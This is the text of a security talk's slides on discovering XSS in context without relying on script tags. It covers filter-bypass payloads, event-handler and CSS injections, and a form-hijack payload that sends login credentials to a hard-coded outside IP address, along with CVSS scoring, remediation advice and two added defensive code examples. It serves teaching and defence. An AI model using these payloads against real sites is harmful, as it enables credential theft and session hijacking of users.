Application Context and Discovering XSS without
Todd Benson
Application Context and Discovering XSS without <Script>
Overview
• Review XSS
• Discuss XSS test cases and discovery
• Context
• CVSS Scoring
• Exploiting
• Complementary Vulnerabilities
• Remediation
XSS Review
• Risk level: Moderate
• Description: Cross-Site Scripting results from application parameters that allow user-supplied input to be presented in subsequent responses. In particular, when the application allows HTML and JavaScript special characters to be reflected, an attacker can cause the victim to observe different application behavior than expected.
• Exploitation vector: In XSS scenarios, the application allows an attacker to use the application as a launching point for attacks against victims' workstations. An attacker with knowledge of the vulnerability can construct URLs to appropriate PACTS application pages that cause malicious activity within the victim's browser.
• Recommendation: Validate user-supplied input server-side. Sanitize special characters (e.g., <, >, ", ', etc.) prior to returning those values to a requesting client.
XSS Test Cases - Formal
1. Submit payloads to each request parameter
2. Identify any instances of the application returning the request parameter unmodified
3. Find the location within the HTML of the supplied input and review the surrounding HTML to identify potential payloads
4. Submit various possible payloads to the application via identified parameters
5. If payloads are returned unmodified, confirm with a browser
6. If the payloads are modified, attempt to bypass the server-side filters
XSS Discovery
• Basic Reflection
  – XSSTEST
• Filter Detection
  – <XSSTEST>
  – <"';()>
  – "';()
  – %3cXSSTEST%3e
  – %3c%22%27%3b%28%29%3e
  – %22%27%3b%28%29
  – %25%33%63XSSTEST%25%33%65
  – %25%33%63%25%32%32%25%32%37%25%33%62%25%32%38%25%32%39%25%33%65
  – %25%32%32%25%32%37%25%33%62%25%32%38%25%32%39
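Added example, not from the slides: detection logic a defender can run over web server access logs to recognise the probe strings listed above, including the double-encoded variants that a filter decoding only once would miss. The access log lines are constructed for this example, the Apache-style log format and the parameter names are assumptions, and the code is written for Node.js.

```javascript
// Added example; not code from the slides. Flags XSS discovery probes in
// access logs after fully decoding percent-encoded parameter values.

// Constructed sample log lines (Apache combined-style, abbreviated).
const SAMPLE_LOG = [
  '192.0.2.10 - - [16/Aug/2022:10:01:02 +0000] "GET /search.php?q=XSSTEST HTTP/1.1" 200 512',
  '192.0.2.10 - - [16/Aug/2022:10:01:03 +0000] "GET /search.php?q=%3cXSSTEST%3e HTTP/1.1" 200 512',
  '192.0.2.10 - - [16/Aug/2022:10:01:04 +0000] "GET /search.php?q=%25%33%63XSSTEST%25%33%65 HTTP/1.1" 200 512',
  '192.0.2.10 - - [16/Aug/2022:10:01:05 +0000] "GET /search.php?q=%25%32%32%25%32%37%25%33%62%25%32%38%25%32%39 HTTP/1.1" 200 512',
  '198.51.100.7 - - [16/Aug/2022:10:02:00 +0000] "GET /search.php?q=blue%20widgets&page=2 HTTP/1.1" 200 2048',
];

// Decode percent-encoding repeatedly until the value stops changing, so the
// detector sees the same characters the application will see after its own
// decoding passes. Malformed sequences are left as they are.
function decodeFully(value, maxRounds = 5) {
  let current = value;
  for (let rounds = 0; rounds < maxRounds; rounds++) {
    let next;
    try { next = decodeURIComponent(current); } catch (e) { next = current; }
    if (next === current) return { value: current, rounds };
    current = next;
  }
  return { value: current, rounds: maxRounds };
}

// Probe indicators from the slide: the canary string, tag delimiters, and
// the JavaScript punctuation a reflection test looks for.
function classify(decoded) {
  const flags = [];
  if (decoded.includes('XSSTEST')) flags.push('canary');
  if (/[<>]/.test(decoded)) flags.push('tag-chars');
  if (/["';()]/.test(decoded)) flags.push('js-chars');
  return flags;
}

// client ip, then the request line's path+query.
const LOG_RE = /^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP\/[\d.]+"/;

function scanLogLines(lines) {
  const findings = [];
  for (const line of lines) {
    const m = LOG_RE.exec(line);
    if (!m) continue;
    const [, ip, url] = m;
    const qs = url.includes('?') ? url.slice(url.indexOf('?') + 1) : '';
    for (const pair of qs.split('&').filter(Boolean)) {
      const eq = pair.indexOf('=');
      const param = eq < 0 ? pair : pair.slice(0, eq);
      const raw = eq < 0 ? '' : pair.slice(eq + 1);
      const { value, rounds } = decodeFully(raw);
      const flags = classify(value);
      if (flags.length === 0) continue;
      // rounds > 1 means the probe was double-encoded, i.e. aimed at a filter.
      findings.push({ ip, param, decoded: value, rounds, flags, doubleEncoded: rounds > 1 });
    }
  }
  return findings;
}

for (const f of scanLogLines(SAMPLE_LOG)) {
  console.log(`${f.ip} ${f.param}=${JSON.stringify(f.decoded)} decoded ${f.rounds}x ${f.flags.join(',')}`);
}
```

The `doubleEncoded` flag is the interesting signal: a plain `XSSTEST` is a scanner doing reflection discovery, while `%25%33%63` reaching the log means someone is already probing how the server-side filter decodes.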
XSS Test Cases – In reality
1. Discover XSS - Tool(s)
2. Confirm existence
3. Show PoC (Alert popup)
4. Craft an exploit
  – Filter?
  – How easily is the exploit detected?
  – Will the exploit run most or all of the time?
  – What are factors that may not allow it to run?
5. With other Vulns
Discovering XSS
Using tools
  – Pretty good, for reflective
  – Some are better than others
  – Even when they are good, they can only do so much
  – At best, PoC
  – Don't understand context
Context
What do we mean by context?
• What… area of the application?
• Where… in the page is the payload injected?
• Who… is the client (User role AND browser)?
• How… will it be exploited?
CVSS Scoring
XSS – Login Demo
• Simple page
  – Enter username on one page and submit
  – Enter password and submit
  – Checks credentials
  – Filters against <script> and variants
XSS – Login Demo (cont)
Simple "><script>alert(1);</script><!--
XSS – Login Demo (cont)
Filter Bypass" type="hidden" /></center></form><object data="data:text/html;charset=utf-8; base64,PHNjcmlwdD5hbGVydCgxKTs8L3NjcmlwdD4NCg%3D%3D" /></body></html><!--
XSS – Login Demo (cont)
Form abuse" type=hidden></form><form action="http://156.132.142.11/passwords.php method="get"><input name="Username" value="
XSS without < or > - Demo
• Page has 6 different inputs, each one exploitable
• For demo purposes only, not meant to be practical or realistic
• < and > are filtered
  – All exploits must be done in context
XSS without < or > - Demo (cont)
Payloads
• Number: ';alert(1);a='
• Link: Test" onclick=alert(1) name="
• Image: a" onerror=alert(1) name="   ## use onload instead?
XSS without < or > - Demo (cont)
Payloads
• Name: Todd";} catch(e) {}; alert(1); try{ a="
• Comment: test" type="image" src="a" onerror=alert(1) name="
• Color: ff000;display:block;position:absolute;top:0;left:0;width:999em;height:999em onmouseover=alert(1)
Exploiting – Crafting an Exploit
What can you do?
• Modify the page (Site defacement)
• Key Logger
• Redirect Browser (Forced Browsing)
  – Steal Cookie (Session hijacking?)
  – XSSF
  – BeEF
  – Load remotely hosted scripts
• Data theft
Exploiting – Crafting an Exploit (Cont)
What else????
• Combination:
  – Number: '; function test() { var elem = document.getElementById("Comment"); elem.value = 'My default value';}; a='
  – Comment: " onblur="test();" id="Comment
Complementary Vulns
• GET/POST
• HttpOnly
• Session Hijacking
• Clickjacking
• CSRF
• File Upload
• What else???
[Diagram: XSS linked to GET/POST, HttpOnly, Session Hijacking, CSRF and Clickjacking]
CVSS Scoring Steps
• One tool finds it – (Report Confidence: Unconfirmed; Exploitability: Unproven that exploit exists)
• Two tools find it – (Report Confidence: Uncorroborated)
• Manual verification in browser – (Report Confidence: Confirmed)
• Popup – (Exploitability: Proof of concept code)
• Exploit – (Exploitability: Functional exploit exists)
CVSS Scoring Steps (Cont)
Impact Metrics; General Modifiers; Access Complexity; Exploitability;
• Type of exploit
• Refined exploit
• Complementary vulns
Remediation
• <>"'=;
• Properly escape all untrusted data based on context (use an anti-XSS library)
• Use Content Security Policy
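Added example, not code from the slides or the demo application: the demo's weak filter (strip only `<` and `>`) next to context-specific output encoding, exercised with the Number, Link and Color payloads from the "XSS without < or >" slides to show why escaping must follow the context the value lands in. The sink templates, the `intact` checks and the CSP string are assumptions made for this example; written for Node.js.

```javascript
// Added example; not code from the slides. Weak filter vs. context-aware encoding.

// The demo application's filter: only angle brackets are removed.
function stripAngleBrackets(s) {
  return String(s).replace(/[<>]/g, '');
}

// HTML attribute context: encode every non-alphanumeric character as a numeric
// entity, so a quote, space or '=' cannot close or extend the attribute.
function encodeForHtmlAttribute(s) {
  return String(s).replace(/[^A-Za-z0-9]/gu,
    c => '&#x' + c.codePointAt(0).toString(16) + ';');
}

// Reverse of encodeForHtmlAttribute, used only to show the encoding is lossless.
function decodeHtmlEntities(s) {
  return s.replace(/&#x([0-9a-f]+);/gi, (_, h) => String.fromCodePoint(parseInt(h, 16)));
}

// Quoted JavaScript string context: \xHH / \uHHHH escapes keep the value inside
// the literal, so a bare quote or ';' cannot end the statement.
function encodeForJsString(s) {
  return String(s).replace(/[^A-Za-z0-9]/gu, c => {
    const cp = c.codePointAt(0);
    if (cp < 0x100) return '\\x' + cp.toString(16).padStart(2, '0');
    if (cp < 0x10000) return '\\u' + cp.toString(16).padStart(4, '0');
    return '\\u{' + cp.toString(16) + '}';
  });
}

// CSS value context: encoding is not enough, so validate against an allow-list
// (a hex colour) and fall back to a harmless default.
function safeCssColor(s) {
  const m = /^#?([0-9A-Fa-f]{3}|[0-9A-Fa-f]{6})$/.exec(String(s));
  return m ? '#' + m[1] : 'inherit';
}

// Payloads copied from the "XSS without < or >" slides.
const PAYLOADS = {
  number: "';alert(1);a='",
  link: 'Test" onclick=alert(1) name="',
  color: 'ff000;display:block;position:absolute;top:0;left:0;width:999em;height:999em onmouseover=alert(1)',
};

// Assumed sink templates for the three inputs, each rendered with the weak filter
// and with context-specific encoding. `intact` is a structural check: does the
// rendered markup contain only the delimiters the template itself wrote?
const countChar = (s, ch) => s.split(ch).length - 1;
const SINKS = {
  number: {
    weak: v => `<script>var a='${stripAngleBrackets(v)}';</script>`,
    safe: v => `<script>var a='${encodeForJsString(v)}';</script>`,
    intact: html => countChar(html, "'") === 2,
  },
  link: {
    weak: v => `<a href="#" name="${stripAngleBrackets(v)}">Test</a>`,
    safe: v => `<a href="#" name="${encodeForHtmlAttribute(v)}">Test</a>`,
    intact: html => countChar(html, '"') === 4 && !/\son\w+=/i.test(html),
  },
  color: {
    // Unquoted attribute: the Color payload's trailing " onmouseover=" relies on it.
    weak: v => `<div style=color:#${stripAngleBrackets(v)}>x</div>`,
    safe: v => `<div style=color:${safeCssColor(v)}>x</div>`,
    intact: html => !/\son\w+=/i.test(html),
  },
};

function evaluateAll(payloads = PAYLOADS) {
  const results = {};
  for (const [name, payload] of Object.entries(payloads)) {
    const sink = SINKS[name];
    const weak = sink.weak(payload);
    const safe = sink.safe(payload);
    results[name] = { weak, safe, weakIntact: sink.intact(weak), safeIntact: sink.intact(safe) };
  }
  return results;
}

// Defence in depth for the "Use Content Security Policy" point: an assumed policy
// that refuses inline script and the <object data="data:..."> element used in the
// Filter Bypass demo.
const EXAMPLE_CSP = "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'";

for (const [name, r] of Object.entries(evaluateAll())) {
  console.log(`${name}: weak filter intact=${r.weakIntact}, encoded intact=${r.safeIntact}`);
}
```

The Color case is the one to notice: no amount of character encoding makes an arbitrary string safe inside a style value, so that context needs validation against an allow-list instead, which is what "based on context" on the slide means in practice. `EXAMPLE_CSP` would be sent as a `Content-Security-Policy` response header.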
Summary
• <script>alert(1);</script> isn't enough to discover XSS and evaluate risk
• Context – Context – Context
  – of payloads
  – of who the user is
  – of location in application
  – of relation to other vulns
Questions?
References
• MITRE
• WAHH
• http://securityoverride.org/articles.php?article_id=13
• SANS 542 and 642
• http://www.slideshare.net/jimmanico